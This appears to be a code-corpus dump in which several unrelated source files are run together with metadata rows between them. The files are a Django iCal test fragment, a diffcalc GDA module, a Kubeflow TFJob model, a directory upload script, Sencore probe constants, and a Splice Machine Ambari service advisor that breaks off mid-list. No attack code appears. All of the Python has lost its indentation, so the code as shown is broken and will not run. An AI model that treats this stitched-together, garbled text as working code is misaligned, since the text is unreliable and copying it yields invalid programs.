calendar.subcomponents[1]["DTEND"].to_ical(), b"20120506T200000"
)
self.assertEquals(
calendar.subcomponents[1]["DTEND"].params["TZID"], "US/Eastern"
)
def test_file_name(self):
request = RequestFactory().get("/test/ical")
view = TestFilenameFeed()
response = view(request)
self.assertIn("Content-Disposition", response)
self.assertEqual(
response["content-disposition"], 'attachment; filename="123.ics"'
)
def test_file_type(self):
request = RequestFactory().get("/test/ical")
view = TestFilenameFeed()
response = view(request)
self.assertIn("Content-Type", response)
self.assertEqual(
response["content-type"],
"text/calendar, text/x-vcalendar, application/hbs-vcs",
)
def test_file_header(self):
request = RequestFactory().get("/test/ical")
view = TestFilenameFeed()
response = view(request)
header = b"BEGIN:VCALENDAR\r\nVERSION:2.0"
self.assertTrue(response.content.startswith(header))
| mit | -4,178,158,778,942,191,000 | 35.898585 | 119 | 0.52496 | false |
DiamondLightSource/diffcalc | diffcalc/gdasupport/you.py | 1 | 4367 | from diffcalc.gdasupport.scannable.diffractometer import DiffractometerScannableGroup
from diffcalc.gdasupport.scannable.hkl import Hkl
from diffcalc.gdasupport.scannable.hkloffset import HklOffset
from diffcalc.gdasupport.scannable.simulation import SimulatedCrystalCounter
from diffcalc.gdasupport.scannable.wavelength import Wavelength
from diffcalc.gdasupport.scannable.parameter import DiffractionCalculatorParameter
from diffcalc.dc import dcyou as _dc
from diffcalc.dc.help import format_command_help
from diffcalc.gdasupport.scannable.sr2 import Sr2
from diffcalc.gdasupport.scannable.qtrans import Qtrans
reload(_dc)
from diffcalc.dc.dcyou import * # @UnusedWildImport
from diffcalc import settings
try:
import gda # @UnusedImport @UnresolvedImport
GDA = True
except:
GDA = False
if not GDA:
from diffcalc.gdasupport.minigda import command
_pos = command.Pos()
_scan = command.Scan(command.ScanDataPrinter())
def pos(*args):
"""
pos show position of all Scannables
pos scn show position of scn
pos scn targetmove scn to target (a number)
"""
return _pos(*args)
def scan(*args):
"""
scan scn start stop step {scn {target}} {det t}
"""
return _scan(*args)
from diffcalc.gdasupport.scannable.sim import sim # @UnusedImport
_scn_group = settings.axes_scannable_group
_diff_scn_name = settings.geometry.name # @UndefinedVariable
_energy_scannable = settings.energy_scannable
# Create diffractometer scannable
_diff_scn = DiffractometerScannableGroup(_diff_scn_name, _dc, _scn_group)
globals()[_diff_scn_name] = _diff_scn
# Create hkl scannables
hkl = Hkl('hkl', _scn_group, _dc)
h = hkl.h
k = hkl.k
l = hkl.l
hkloffset = HklOffset('hkloffset', _scn_group, _dc)
h_offset = hkloffset.h
k_offset = hkloffset.k
l_offset = hkloffset.l
pol_offset = hkloffset.polar
az_offset = hkloffset.azimuthal
sr2 = Sr2('sr2', _scn_group, _dc)
qtrans = Qtrans('qtrans', _scn_group, _dc)
Hkl.dynamic_docstring = format_command_help(hkl_commands_for_help) # must be on the class
ub.__doc__ = format_command_help(ub_commands_for_help)
if settings.include_reference:
_virtual_angles = ('theta', 'ttheta', 'qaz', 'alpha', 'naz', 'tau', 'psi', 'beta', 'betain', 'betaout')
else:
_virtual_angles = ('theta', 'ttheta', 'qaz', 'betain', 'betaout')
hklverbose = Hkl('hklverbose', _scn_group, _dc, _virtual_angles)
# Create wavelength scannable
wl = Wavelength(
'wl', _energy_scannable, settings.energy_scannable_multiplier_to_get_KeV)
if not GDA:
wl.asynchronousMoveTo(1) # Angstrom
_energy_scannable.level = 3
wl.level = 3
# Create simulated counter timer
ct = SimulatedCrystalCounter('ct', _scn_group, settings.geometry, wl)
ct.level = 10
# Create constraint scannables
def _create_constraint_scannable(con_name, scn_name=None):
if not scn_name:
scn_name = con_name
return DiffractionCalculatorParameter(
scn_name, con_name, _dc.constraint_manager)
# Detector constraints
def isconstrainable(name):
return not constraint_manager.is_constraint_fixed(name)
if isconstrainable('delta'): delta_con = _create_constraint_scannable('delta', 'delta_con')
if isconstrainable('gam'): gam_con = _create_constraint_scannable('gam', 'gam_con')
if isconstrainable('qaz'): qaz = _create_constraint_scannable('qaz')
if isconstrainable('naz'): naz = _create_constraint_scannable('naz')
# Reference constraints
if settings.include_reference:
alpha = _create_constraint_scannable('alpha')
beta = _create_constraint_scannable('beta')
psi = _create_constraint_scannable('psi')
a_eq_b = 'a_eq_b'
betain = _create_constraint_scannable('betain')
betaout = _create_constraint_scannable('betaout')
bin_eq_bout = 'bin_eq_bout'
# Sample constraints
if isconstrainable('mu'): mu_con = _create_constraint_scannable('mu', 'mu_con')
if isconstrainable('eta'): eta_con = _create_constraint_scannable('eta', 'eta_con')
if isconstrainable('chi'): chi_con = _create_constraint_scannable('chi', 'chi_con')
if isconstrainable('phi'): phi_con = _create_constraint_scannable('phi', 'phi_con')
if isconstrainable('mu') and isconstrainable('gam'): mu_is_gam = 'mu_is_gam'
omega = _create_constraint_scannable('omega')
bisect = 'bisect'
# Cleanup other cruft
del format_command_help
| gpl-3.0 | -3,793,663,831,858,863,000 | 32.083333 | 107 | 0.715365 | false |
kubeflow/tf-operator | sdk/python/kubeflow/tfjob/models/v1_tf_job.py | 1 | 7910 | # Copyright 2019 kubeflow.org.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
"""
tfjob
Python SDK for TF-Operator # noqa: E501
OpenAPI spec version: v0.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from kubernetes.client import V1ObjectMeta # noqa: F401,E501
from kubeflow.tfjob.models.v1_job_status import V1JobStatus # noqa: F401,E501
from kubeflow.tfjob.models.v1_tf_job_spec import V1TFJobSpec # noqa: F401,E501
class V1TFJob(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'api_version': 'str',
'kind': 'str',
'metadata': 'V1ObjectMeta',
'spec': 'V1TFJobSpec',
'status': 'V1JobStatus'
}
attribute_map = {
'api_version': 'apiVersion',
'kind': 'kind',
'metadata': 'metadata',
'spec': 'spec',
'status': 'status'
}
def __init__(self, api_version=None, kind=None, metadata=None, spec=None, status=None): # noqa: E501
"""V1TFJob - a model defined in Swagger""" # noqa: E501
self._api_version = None
self._kind = None
self._metadata = None
self._spec = None
self._status = None
self.discriminator = None
if api_version is not None:
self.api_version = api_version
if kind is not None:
self.kind = kind
if metadata is not None:
self.metadata = metadata
if spec is not None:
self.spec = spec
if status is not None:
self.status = status
@property
def api_version(self):
"""Gets the api_version of this V1TFJob. # noqa: E501
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources # noqa: E501
:return: The api_version of this V1TFJob. # noqa: E501
:rtype: str
"""
return self._api_version
@api_version.setter
def api_version(self, api_version):
"""Sets the api_version of this V1TFJob.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources # noqa: E501
:param api_version: The api_version of this V1TFJob. # noqa: E501
:type: str
"""
self._api_version = api_version
@property
def kind(self):
"""Gets the kind of this V1TFJob. # noqa: E501
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds # noqa: E501
:return: The kind of this V1TFJob. # noqa: E501
:rtype: str
"""
return self._kind
@kind.setter
def kind(self, kind):
"""Sets the kind of this V1TFJob.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds # noqa: E501
:param kind: The kind of this V1TFJob. # noqa: E501
:type: str
"""
self._kind = kind
@property
def metadata(self):
"""Gets the metadata of this V1TFJob. # noqa: E501
Standard Kubernetes object's metadata. # noqa: E501
:return: The metadata of this V1TFJob. # noqa: E501
:rtype: V1ObjectMeta
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""Sets the metadata of this V1TFJob.
Standard Kubernetes object's metadata. # noqa: E501
:param metadata: The metadata of this V1TFJob. # noqa: E501
:type: V1ObjectMeta
"""
self._metadata = metadata
@property
def spec(self):
"""Gets the spec of this V1TFJob. # noqa: E501
Specification of the desired state of the TFJob. # noqa: E501
:return: The spec of this V1TFJob. # noqa: E501
:rtype: V1TFJobSpec
"""
return self._spec
@spec.setter
def spec(self, spec):
"""Sets the spec of this V1TFJob.
Specification of the desired state of the TFJob. # noqa: E501
:param spec: The spec of this V1TFJob. # noqa: E501
:type: V1TFJobSpec
"""
self._spec = spec
@property
def status(self):
"""Gets the status of this V1TFJob. # noqa: E501
Most recently observed status of the TFJob. Read-only (modified by the system). # noqa: E501
:return: The status of this V1TFJob. # noqa: E501
:rtype: V1JobStatus
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this V1TFJob.
Most recently observed status of the TFJob. Read-only (modified by the system). # noqa: E501
:param status: The status of this V1TFJob. # noqa: E501
:type: V1JobStatus
"""
self._status = status
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(V1TFJob, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1TFJob):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| apache-2.0 | 2,290,367,220,663,842,300 | 31.024291 | 295 | 0.604172 | false |
Mossman1215/pgp-backup | upload_dir_instructions.py | 1 | 2112 | import os,sys,json,random
class uploadTest:
def __init__(self):
self.source = sys.argv[1]
self.f = open("operations.txt",'w',1)
self.counter = 0
print('running')
self.mapping = dict()
def getParentID(self,filename):
#search the dictionary for the filename
if(filename in self.mapping):
return self.mapping[filename]
else:
return -1
def getNewID(self):
self.counter += 1
return self.counter
def getRandomID(self):
return random.randrange(0,1000,1)
def run(self):
print(self.number_of_operations())
for root,subdirs,files in os.walk(self.source, topdown=True):
#store the root id
title = os.path.basename(root)
identifier = self.getNewID()
pID = self.getParentID(title)
if(pID == -1):
pID = self.getRandomID()
self.f.write(title+','+str(identifier)+','+str(pID)+'\n')
for subdir in subdirs:
subName = os.path.basename(subdir)
self.mapping[subName] = identifier
for fi in files:
filefolder = os.path.basename(fi)
fileID = self.getRandomID()
self.f.write(filefolder+','+str(fileID)+','+str(identifier)+'\n')
self.f.write('\n')
print('complete')
self.f.close()
def number_of_operations(self):
count = 0
for root,subdirs,files in os.walk(self.source, topdown=True):
count+=1
count= count + len(files)
return count
if(__name__ == '__main__'):
var = uploadTest()
var.run()
| mit | -2,677,422,769,158,516,000 | 43 | 97 | 0.432292 | false |
Fe-Nik-S/Examples | python/external_api/Sencore/lib/const.py | 1 | 4426 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from collections import namedtuple
path_attr = namedtuple("path_attr", ("PATH", "ATTR"))
__ALL__ = ["SENCORE_URLS_ENUM", "SENCORE_DATA_PATH", "SENCORE_ATTRS_ENUM", "RESULT_PATH"]
class SENCORE_URLS_ENUM(object):
ETH = "http://{address}/probe/ethdata"
ETR_ALL = "http://{address}/probe/etrdata?&&"
ETR = "http://{address}/probe/etrdata?inputId={input_id}&tuningSetupId={ts_index}"
GENERAL = "http://{address}/probe/generaldata?&&"
STATUS = "http://{address}/probe/status"
REFERENCE_BASE_URL = "https://mgmt.hq.ertelecom.ru/chtp/api/dir/%7B%22rec_type_id%22:2020%7D"
TDT_TIME = "http://{address}/probe/data/AnaParseTable?inputId=1&etrEngineNo=0&pid=0&tid=112&tidExtension=-1"
QAM_TIME = "http://{address}/probe/data/AnaParseTable?inputId=1&etrEngineNo=0&pid=20&tid=112&tidExtension=-1"
ETH_TIME = "http://{address}/probe/data/AnaParseTable?inputId=100&etrEngineNo=0&pid=20&tid=112&tidExtension=-1"
class SENCORE_ATTRS_ENUM(object):
__slots__ = ("ETH", "REQUIRED_PIDS")
ETH = ("bitrate", "name", "index", "cc_errors", "net_bitrate", "iat_avg")
REQUIRED_PIDS = {"0", "1", "16", "17", "18", "20", "89", "99"}
class SENCORE_DATA_PATH(object):
__slots__ = (
"ETH_TSS", "ETR_PIDS", "ETR_PIDS", "ETR_SERVICES", "ETR_CHECKS",
"GENERAL_VERSION", "GENERAL_MLERROR", "GENERAL_UPTIME",
"STATUS_CPU_TEMP", "STATUS_PORT", "STATUS_FREE_DISC",
"STATUS_STATUS_FREE_MEM", "STATUS_TIME"
)
ETH_TSS = path_attr(**{
"PATH": "EthExportData,streams,mon",
"ATTR": ("bitrate", "name", "index", "cc_errors",
"net_bitrate", "iat_avg", "dst_addr")
})
ETR_PIDS = path_attr(**{
"PATH": "Etr290ExportData,input,tuningSetup,pidList,pid",
"ATTR": ("id", "bitrate", ("max_bitrate", "maxBitrate"),
("min_bitrate", "minBitrate"), ("num_cc_errors", "numCcErrors"), "scrambled")
})
ETR_SERVICES = path_attr(**{
"PATH": "Etr290ExportData,input,tuningSetup,serviceList,service",
"ATTR": ("id", "name", "bitrate", "scrambled", "symbolrate")
})
ETR_CHECKS = path_attr(**{
"PATH": "Etr290ExportData,input,tuningSetup,etrList,group",
"ATTR": ()
})
GENERAL_VERSION = path_attr(**{
"PATH": "GeneralProbeExportData,release",
"ATTR": "version"
})
GENERAL_UPTIME = path_attr(**{
"PATH": "GeneralProbeExportData,internet,mgmt,mib2,system,sysUpTime",
"ATTR": "uptime"
})
GENERAL_MLERROR = path_attr(**{
"PATH": ("GeneralProbeExportData,internet,private,"
"enterprise,bridgetech,mlrerrTable,row"),
"ATTR": ("mlrerr1m", )
})
GENERAL_MW = path_attr(**{
"PATH": ("GeneralProbeExportData,internet,private,"
"enterprise,bridgetech,mwTable,row"),
"ATTR": ("iatPeak1m", "mlrSum1m")
})
GENERAL_CHANNEL = path_attr(**{
"PATH": ("GeneralProbeExportData,internet,private,"
"enterprise,bridgetech,channelTable,row"),
"ATTR": ("chindex", )
})
STATUS_TIME = path_attr(**{
"PATH": "Status,System,time",
"ATTR": "time"
})
STATUS_CPU_TEMP = path_attr(**{
"PATH": "Status,System,cpu_temp",
"ATTR": "cpu_temp"
})
STATUS_FREE_MEM = path_attr(**{
"PATH": "Status,Resources,ram_free",
"ATTR": "free_mem"
})
STATUS_FREE_DISC = path_attr(**{
"PATH": "Status,Resources,disk_free",
"ATTR": "free_disc"
})
STATUS_PORT = "Status,Interfaces,Fixed,Data,status"
ETR_INPUTS = path_attr(**{
"PATH": "Etr290ExportData,input",
"ATTR": (("current_bitrate", "effectiveBitrate"),
("min_signal_level", "minSignalLevel"),
("max_signal_level", "maxSignalLevel"),
("max_centre_frequency_offset", "maxCentreFrequencyOffset"),
("max_current_bitrate", "maximumEffectiveBitrate"), "id",
"name", "description", "symbolrate", "minSnr", "minMer",
("symbolrate_offset", "maxSymbolRateOffset")
)
})
TEMP_PATH = "/tmp/send2zabbix/"
AUTODISCOVERY_SEND_PERIOD = 12
AUTODISCOVERY_SEND_TIMESTAMP = "timestamp"
TIMEOUT = 900
URL_REQUEST_TIMEOUT = 10
TIME_SERVER = ''
ZABBIX_HOST = ""
ZABBIX_PORT = "10051"
DATETIME_FORMAT = "%Y-%m-%d %H:%M:%S"
| mit | -8,902,507,808,757,745,000 | 33.310078 | 115 | 0.584049 | false |
splicemachine/spliceengine | assembly/hdp3.1.0/src/main/resources/common-services/SPLICEMACHINE/2.5.1/service_advisor.py | 1 | 16882 | #!/usr/bin/env ambari-python-wrap
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import imp
import math
import os
import re
import socket
import traceback
import glob
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
STACKS_DIR = os.path.join(SCRIPT_DIR, '../../../stacks/')
PARENT_FILE = os.path.join(STACKS_DIR, 'service_advisor.py')
try:
with open(PARENT_FILE, 'rb') as fp:
service_advisor = imp.load_module('service_advisor', fp, PARENT_FILE, ('.py', 'rb', imp.PY_SOURCE))
except Exception as e:
traceback.print_exc()
print "Failed to load parent"
class SPLICEMACHINE251ServiceAdvisor(service_advisor.ServiceAdvisor):
def __init__(self, *args, **kwargs):
self.as_super = super(SPLICEMACHINE251ServiceAdvisor, self)
self.as_super.__init__(*args, **kwargs)
def colocateService(self, hostsComponentsMap, serviceComponents):
pass
def getServiceComponentLayoutValidations(self, services, hosts):
print "getServiceComponentLayoutValidations"
return []
def getServiceConfigurationRecommendations(self, configurations, clusterData, services, hosts):
#Update HBase Classpath
print "getServiceConfigurationRecommendations",services
if "hbase-env" in services["configurations"]:
hbase_env = services["configurations"]["hbase-env"]["properties"]
if "content" in hbase_env:
content = hbase_env["content"]
HBASE_CLASSPATH_PREFIX = "export HBASE_CLASSPATH_PREFIX=/var/lib/splicemachine/*:/usr/hdp/3.1.0.0-78/spark2/jars/*:/usr/hdp/3.1.0.0-78/hadoop/lib/ranger-hdfs-plugin-impl/*:/usr/hdp/3.1.0.0-78/hbase/lib/atlas-hbase-plugin-impl/kafka*"
HBASE_MASTER_OPTS = "export HBASE_MASTER_OPTS=\"${HBASE_MASTER_OPTS} -D"+ " -D".join(self.getMasterDashDProperties()) + "\""
HBASE_REGIONSERVER_OPTS = "export HBASE_REGIONSERVER_OPTS=\"${HBASE_REGIONSERVER_OPTS} -D"+ " -D".join(self.getRegionServerDashDProperties()) + "\""
HBASE_CONF_DIR = "export HBASE_CONF_DIR=${HBASE_CONF_DIR}:/etc/splicemachine/conf/"
if "splicemachine" not in content:
print "Updating Hbase Env Items"
HBASE_CLASSPATH_PREFIX = "#Add Splice Jars to HBASE_PREFIX_CLASSPATH\n" + HBASE_CLASSPATH_PREFIX
HBASE_MASTER_OPTS = "#Add Splice Specific Information to HBase Master\n" + HBASE_MASTER_OPTS
HBASE_REGIONSERVER_OPTS = "#Add Splice Specific Information to Region Server\n" + HBASE_REGIONSERVER_OPTS
HBASE_CONF_DIR = "#Add Splice Specific Information to Region Server\n" + HBASE_CONF_DIR
content = "\n\n".join((content, HBASE_CLASSPATH_PREFIX))
content = "\n\n".join((content, HBASE_MASTER_OPTS))
content = "\n\n".join((content, HBASE_REGIONSERVER_OPTS))
content = "\n\n".join((content, HBASE_CONF_DIR))
print "content: " + content
putHbaseEnvProperty = self.putProperty(configurations, "hbase-env", services)
putHbaseEnvProperty("content", content)
# Update HDFS properties in core-site
if "core-site" in services["configurations"]:
core_site = services["configurations"]["core-site"]["properties"]
putCoreSiteProperty = self.putProperty(configurations, "core-site", services)
for property, desired_value in self.getCoreSiteDesiredValues().iteritems():
if property not in core_site or core_site[property] != desired_value:
putCoreSiteProperty(property, desired_value)
# Update hbase-site properties in hbase-site
if "hbase-site" in services["configurations"]:
hbase_site = services["configurations"]["hbase-site"]["properties"]
putHbaseSitePropertyAttributes = self.putPropertyAttribute(configurations, "hbase-site")
putHBaseSiteProperty = self.putProperty(configurations, "hbase-site", services)
for property, desired_value in self.getHBaseSiteDesiredValues().iteritems():
if property not in hbase_site or hbase_site[property] != desired_value:
putHBaseSiteProperty(property, desired_value)
# Update hbase-site properties in hbase-site
if "yarn-site" in services["configurations"]:
yarn_site = services["configurations"]["yarn-site"]["properties"]
putYarnSitePropertyAttributes = self.putPropertyAttribute(configurations, "yarn-site")
putYarnSiteProperty = self.putProperty(configurations, "yarn-site", services)
for property, desired_value in self.getYarnSiteDesiredValues().iteritems():
if property not in yarn_site or yarn_site[property] != desired_value:
putYarnSiteProperty(property, desired_value)
#update zookeeper configs
if 'zoo.cfg' in services['configurations']:
zoo_cfg = services['configurations']['zoo.cfg']["properties"]
print(zoo_cfg),zoo_cfg
putZooProperty = self.putProperty(configurations, "zoo.cfg", services)
putZooProperty('maxClientCnxns',0)
putZooProperty('maxSessionTimeout',120000)
def getServiceConfigurationsValidationItems(self, configurations, recommendedDefaults, services, hosts):
print "getServiceConfigurationsValidationItems"
return []
# print "getServiceConfigurationsValidationItems"
# validate recommended properties in core-site
# siteName = "core-site"
# method = self.validateCoreSiteConfigurations
# items = self.validateConfigurationsForSite(configurations, recommendedDefaults, services, hosts, siteName, method)
# siteName = "hdfs-site"
# method = self.validateHDFSSiteConfigurations
# resultItems = self.validateConfigurationsForSite(configurations, recommendedDefaults, services, hosts, siteName, method)
# items.extend(resultItems)
# siteName = "hbase-site"
# method = self.validateHBaseSiteConfigurations
# resultItems = self.validateConfigurationsForSite(configurations, recommendedDefaults, services, hosts, siteName, method)
# items.extend(resultItems)
def validateCoreSiteConfigurations(self, properties, recommendedDefaults, configurations, services, hosts):
print "validateCoreSiteConfigurations"
core_site = properties
validationItems = []
for property, desired_value in self.getCoreSiteDesiredValues().iteritems():
if property not in core_site or core_site[property] != desired_value:
message = "Splice Machine requires this property to be set to the recommended value of " + desired_value
validationItems.append({"config-name": property, "item": self.getWarnItem(message)})
return self.toConfigurationValidationProblems(validationItems, "core-site")
def validateHDFSSiteConfigurations(self, properties, recommendedDefaults, configurations, services, hosts):
print "validateHDFSSiteConfigurations"
hdfs_site = properties
validationItems = []
for property, desired_value in self.getHDFSSiteDesiredValues().iteritems():
if property not in hdfs_site or hdfs_site[property] != desired_value:
message = "Splice Machine requires this property to be set to the recommended value of " + desired_value
validationItems.append({"config-name": property, "item": self.getWarnItem(message)})
return self.toConfigurationValidationProblems(validationItems, "hdfs-site")
def validateHBaseSiteConfigurations(self, properties, recommendedDefaults, configurations, services, hosts):
print "validateHBaseSiteConfigurations"
hbase_site = properties
validationItems = []
for property, desired_value in self.getHBaseSiteDesiredValues().iteritems():
print "->" + property + ":" + desired_value + ":" + hbase_site[property]
if property not in hbase_site or hbase_site[property] != desired_value:
message = "Splice Machine requires this property to be set to the recommended value of " + desired_value
validationItems.append({"config-name": property, "item": self.getWarnItem(message)})
return self.toConfigurationValidationProblems(validationItems, "hbase-site")
def getCoreSiteDesiredValues(self):
core_site_desired_values = {
"ipc.server.listen.queue.size" : "3300"
}
return core_site_desired_values
def getHDFSSiteDesiredValues(self):
hdfs_site_desired_values = {
"dfs.datanode.handler.count" : "20",
"dfs.client.read.shortcircuit.buffer.size" : "131072",
}
return hdfs_site_desired_values
def getYarnSiteDesiredValues(self):
yarn_site_desired_values = {
"hdp.version" : "3.1.0.0-78"
}
return yarn_site_desired_values
def getHBaseSiteDesiredValues(self):
hbase_site_desired_values = {
"hbase.coprocessor.master.classes" : "com.splicemachine.hbase.SpliceMasterObserver",
"hbase.regionserver.global.memstore.size" : "0.25",
"hfile.block.cache.size" : "0.25",
"hbase.regionserver.handler.count" : "200",
"hbase.client.scanner.caching" : "1000",
"hbase.hstore.blockingStoreFiles" : "20",
"hbase.hstore.compactionThreshold" : "5",
"hbase.balancer.period" : "60000",
"hbase.client.ipc.pool.size" : "10",
"hbase.client.max.perregion.tasks" : "100",
"hbase.coprocessor.regionserver.classes" : "com.splicemachine.hbase.RegionServerLifecycleObserver,com.splicemachine.hbase.SpliceRSRpcServices",
"hbase.hstore.compaction.min.size" : "136314880",
"hbase.hstore.compaction.min" : "3",
"hbase.hstore.defaultengine.compactionpolicy.class" : "com.splicemachine.compactions.SpliceDefaultCompactionPolicy",
"hbase.hstore.defaultengine.compactor.class" : "com.splicemachine.compactions.SpliceDefaultCompactor",
"hbase.hstore.defaultengine.storeflusher.class" : "com.splicemachine.compactions.SpliceDefaultFlusher",
"hbase.coprocessor.region.classes" : "org.apache.hadoop.hbase.security.access.SecureBulkLoadEndpoint,com.splicemachine.hbase.MemstoreAwareObserver,com.splicemachine.derby.hbase.SpliceIndexObserver,com.splicemachine.derby.hbase.SpliceIndexEndpoint,com.splicemachine.hbase.RegionSizeEndpoint,com.splicemachine.si.data.hbase.coprocessor.TxnLifecycleEndpoint,com.splicemachine.si.data.hbase.coprocessor.SIObserver,com.splicemachine.hbase.BackupEndpointObserver",
"hbase.htable.threads.max" : "96",
"hbase.ipc.warn.response.size" : "-1",
"hbase.ipc.warn.response.time" : "-1",
"hbase.master.loadbalance.bytable" : "true",
"hbase.master.balancer.stochastic.regionCountCost" : "1500",
"hbase.regions.slop" : "0",
"hbase.regionserver.global.memstore.size.lower.limit" : "0.9",
"hbase.client.scanner.timeout.period" : "1200000",
"hbase.regionserver.maxlogs" : "48",
"hbase.regionserver.thread.compaction.large" : "1",
"hbase.regionserver.thread.compaction.small" : "4",
"hbase.regionserver.wal.enablecompression" : "true",
"hbase.rowlock.wait.duration" : "10",
"hbase.splitlog.manager.timeout" : "3000",
"hbase.status.multicast.port" : "16100",
"hbase.wal.disruptor.batch" : "true",
"hbase.wal.provider" : "multiwal",
"hbase.wal.regiongrouping.numgroups" : "16",
"hbase.zookeeper.property.tickTime" : "6000",
"hbase.mirror.table.state.to.zookeeper" : "FALSE",
"hbase.migrate.table.state.from.zookeeper": "FALSE",
"hfile.block.bloom.cacheonwrite" : "TRUE",
"io.storefile.bloom.error.rate" : "0.005",
"splice.authentication.native.algorithm" : "SHA-512",
"splice.authentication" : "NATIVE",
"splice.client.numConnections" : "1",
"splice.client.write.maxDependentWrites" : "60000",
"splice.client.write.maxIndependentWrites" : "60000",
"splice.compression" : "snappy",
"splice.marshal.kryoPoolSize" : "1100",
"splice.olap_server.clientWaitTime" : "900000",
"splice.ring.bufferSize" : "131072",
"splice.splitBlockSize" : "67108864",
"splice.timestamp_server.clientWaitTime" : "120000",
"splice.txn.activeTxns.cacheSize" : "10240",
"splice.txn.completedTxns.concurrency" : "128",
"splice.txn.concurrencyLevel" : "4096",
"splice.olap_server.memory" : "8192",
"splice.olap_server.memoryOverhead" : "2048",
"splice.olap_server.virtualCores" : "2",
"splice.authorization.scheme" : "NATIVE",
"hbase.replication.source.service" : "com.splicemachine.replication.SpliceReplication",
"hbase.replication.sink.service" : "com.splicemachine.replication.SpliceReplication",
"hbase.bucketcache.ioengine" : "",
"hbase.regionserver.replication.handler.count":"40"
}
return hbase_site_desired_values
def getMasterDashDProperties(self):
dashDProperties = [
"splice.spark.enabled=true",
"splice.spark.app.name=SpliceMachine",
"splice.spark.master=yarn",
"splice.spark.submit.deployMode=client",
"splice.spark.logConf=true",
"splice.spark.yarn.maxAppAttempts=1",
"splice.spark.driver.maxResultSize=1g",
"splice.spark.driver.cores=2",
"splice.spark.yarn.am.memory=1g",
"splice.spark.dynamicAllocation.enabled=true",
"splice.spark.dynamicAllocation.executorIdleTimeout=120",
"splice.spark.dynamicAllocation.cachedExecutorIdleTimeout=120",
"splice.spark.dynamicAllocation.minExecutors=0",
"splice.spark.kryo.referenceTracking=false",
"splice.spark.kryo.registrator=com.splicemachine.derby.impl.SpliceSparkKryoRegistrator",
"splice.spark.kryoserializer.buffer.max=512m",
"splice.spark.kryoserializer.buffer=4m",
"splice.spark.locality.wait=100",
"splice.spark.memory.fraction=0.5",
"splice.spark.scheduler.mode=FAIR",
"splice.spark.serializer=org.apache.spark.serializer.KryoSerializer",
"splice.spark.shuffle.compress=false",
"splice.spark.shuffle.file.buffer=128k",
"splice.spark.shuffle.service.enabled=true",
"splice.spark.reducer.maxReqSizeShuffleToMem=134217728",
"splice.spark.yarn.am.extraLibraryPath=/usr/hdp/current/hadoop-client/lib/native",
"splice.spark.yarn.am.waitTime=10s",
"splice.spark.yarn.executor.memoryOverhead=2048",
"splice.spark.yarn.am.extraJavaOptions=-Dhdp.version=3.1.0.0-78",
"splice.spark.driver.extraJavaOptions=-Dhdp.version=3.1.0.0-78",
"splice.spark.driver.extraLibraryPath=/usr/hdp/current/hadoop-client/lib/native",
"splice.spark.driver.extraClassPath=/usr/hdp/current/hbase-regionserver/conf:/usr/hdp/current/hbase-regionserver/lib/htrace-core-3.1.0-incubating.jar",
"splice.spark.ui.retainedJobs=100",
"splice.spark.ui.retainedStages=100",
"splice.spark.worker.ui.retainedExecutors=100",
"splice.spark.worker.ui.retainedDrivers=100",
"splice.spark.streaming.ui.retainedBatches=100",
"splice.spark.executor.cores=4",
"splice.spark.executor.memory=8g",
"spark.compaction.reserved.slots=4",
"splice.spark.eventLog.enabled=true",
"splice.spark.eventLog.dir=hdfs:///user/splice/history",
"splice.spark.local.dir=/tmp",
"splice.spark.executor.userClassPathFirst=true",
"splice.spark.driver.userClassPathFirst=true",
"splice.spark.executor.extraJavaOptions=-Dhdp.version=3.1.0.0-78",
"splice.spark.executor.extraLibraryPath=/usr/hdp/current/hadoop-client/lib/native",
